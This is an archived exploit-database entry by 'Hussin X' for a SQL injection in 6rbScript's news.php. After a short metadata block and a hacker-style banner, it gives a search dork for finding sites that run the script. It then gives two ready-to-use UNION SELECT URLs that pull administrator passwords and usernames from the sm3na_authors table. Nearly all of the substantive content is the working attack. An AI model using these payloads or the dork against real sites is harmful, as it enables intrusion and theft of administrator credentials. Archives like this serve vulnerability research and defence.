6rbScript - 'news.php' SQL Injection
Author: Hussin X
type: webapps
platform: php
port:
date_added: 2008-05-20
date_updated: 2016-11-30
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
##########################################################
#
# 6rbScript SQL Injection Vulnerability
#
# by Hussin X
#
# Home: www.tryag.cc/cc
#
# darkangel_g85[at]Yahoo[DoT]com
#
# DoRK: Powered by 6rbScript
##########################################################
##########################################################
Exploit:
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
###########################################################
Greetz: All IRAQI And all HACKER
###########################################################
# milw0rm.com [2008-05-21]